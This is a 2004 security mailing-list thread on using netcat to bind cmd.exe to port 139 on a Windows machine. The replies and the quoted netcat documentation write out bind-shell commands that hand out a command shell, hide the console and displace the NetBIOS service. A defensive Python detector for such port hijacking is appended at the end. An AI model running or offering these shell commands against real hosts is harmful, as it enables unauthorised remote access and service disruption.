Re: nc help needed.

From: Gautam R. Singh (gautam.singh_at_gmail.com)
Date: 09/25/04

    Date: Sat, 25 Sep 2004 21:08:38 +0530
    To: security-basics@securityfocus.com
    
    

    The -s I believe would be the source
    address - the IP address of the machine from where you are connecting.

    192.168.10.14> nc.exe -v -L -d -e cmd.exe -p 139 -s 192.168.10.15

    192.168.10.15> telnet 192.168.10.14 139
    or
    192.168.10.15> nc -v 192.168.10.14 139

    Try to use a different port and see if it is working. If it does, then use 139.

    ~gautam

    On Fri, 24 Sep 2004 18:56:59 +0530, Vijay Kumar <vijay@calsoftinc.com> wrote:
    > Hi,
    >
    > Thanks a ton for all the replies. I know that Netbios is using port 139.
    > Since the Windows computer is currently accepting null sessions, we
    > should be able to connect to this port via netcat. (Am I right?)
    > Have been reading these lines from the documentation, which talks about
    > assigning priority to the netcat session we are trying to establish.
    > Hence I am sure this should work, we are missing something.
    > Does anyone have anything to add?
    > Also I am not understanding whether the -s <ip address> should be the
    > computer running netcat or the destination (target) machine?
    >
    > "" You will need to bind "in front of" some services that may already be
    > listening on those ports. An example is the NETBIOS Session Service
    > that is running on port 139 of NT machines that are sharing files. You
    > need to bind to a specific source address (one of the IP addresses of
    > the machine) to accomplish this. This gives Netcat priority over the
    > NETBIOS service which is at a lower priority because it is bound to ANY
    > IP address. This is done with the Netcat -s option:
    >
    > nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx
    >
    > Now you can connect to the machine on port 139 and Netcat will field
    > the connection before NETBIOS does. You have effectively shut off
    > file sharing on this machine by the way. You have done this with just
    > user privileges to boot. ""
    >
    > Have not used psexec -> will try it.
    >
    > Regards
    > Vijay.
    >
    > On Fri, 2004-09-24 at 17:55, Scream wrote:
    > > using the -p 139 command line switch would attempt to bind to port 139 on
    > > the machine you are running it on which being a windows machine is already
    > > in use..
    > >
    > >
    > > If you are trying to connect to the remote then it would be, this however
    > > will not spawn a cmd session.
    > >
    > > nc -v ip addr 139
    > >
    > >
    > > ----- Original Message -----
    > > From: "Vijay Kumar" <vijay@calsoftinc.com>
    > > To: <security-basics@securityfocus.com>
    > > Sent: Thursday, September 23, 2004 11:21 AM
    > > Subject: nc help needed.
    > >
    > >
    > > > Hi,
    > > >
    > > > Trying to use the nc command from a windows 2k box :
    > > >
    > > > nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx
    > > >
    > > > The error given is : Can't grab xxx.xxx.xxx.xxx:139 with bind.
    > > >
    > > > s -> destination host where the null sessions on 139 are accepted.
    > > >
    > > > Any clue how to get the cmd working on the remote host?
    > > >
    > > > Regards,
    > > > Vijay.

    --
    Gautam R. Singh
    PGP Key: http://gautam.techwhack.com/key/
    NOTE: The information contained in this message is confidential and
    intended only for the use of the individual or entity identified. If
    the reader of this message is not the intended recipient, any
    dissemination, distribution or copying of the information in this
    message is strictly prohibited. If you have received this message by
    error, please notify the sender immediately.
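
The documentation quoted in this thread describes a listener bound to one specific IP address taking connections ahead of a service bound to ANY address on the same port. As an added example (not part of the original thread or of netcat), the following Python checks listener output for exactly that condition; the sample text is constructed, and the column layout of `netstat -ano` on Windows versions that support the `-o` flag is assumed.

```python
import re
from collections import defaultdict

# Constructed sample of `netstat -ano` output (not captured from a real host).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING       4
  TCP    192.168.10.14:139      0.0.0.0:0              LISTENING       2316
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.10.14:3389     0.0.0.0:0              LISTENING       1100
  TCP    192.168.10.14:1042     192.168.10.15:139      ESTABLISHED     4
"""

# Matches IPv4 TCP rows in LISTENING state only; other rows are ignored.
LISTEN_ROW = re.compile(
    r"^\s*TCP\s+(?P<addr>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$"
)

def parse_listeners(netstat_text):
    """Return {port: [(local_addr, pid), ...]} for IPv4 TCP listeners."""
    listeners = defaultdict(list)
    for line in netstat_text.splitlines():
        m = LISTEN_ROW.match(line)
        if m:
            listeners[int(m["port"])].append((m["addr"], int(m["pid"])))
    return listeners

def find_shadowed_ports(netstat_text):
    """Flag ports where a specific-address listener sits in front of a
    wildcard (0.0.0.0) listener owned by a different process."""
    findings = []
    for port, entries in sorted(parse_listeners(netstat_text).items()):
        wildcard_pids = {pid for addr, pid in entries if addr == "0.0.0.0"}
        for addr, pid in entries:
            if addr != "0.0.0.0" and wildcard_pids and pid not in wildcard_pids:
                findings.append({"port": port, "specific_addr": addr,
                                 "specific_pid": pid,
                                 "wildcard_pids": sorted(wildcard_pids)})
    return findings

if __name__ == "__main__":
    for f in find_shadowed_ports(SAMPLE_NETSTAT):
        print("port %(port)d: PID %(specific_pid)d bound to %(specific_addr)s "
              "in front of wildcard listener PID(s) %(wildcard_pids)s" % f)
```

On Windows, a service that opens its listening socket with `SO_EXCLUSIVEADDRUSE` prevents another process from binding the same port on a specific address in this way.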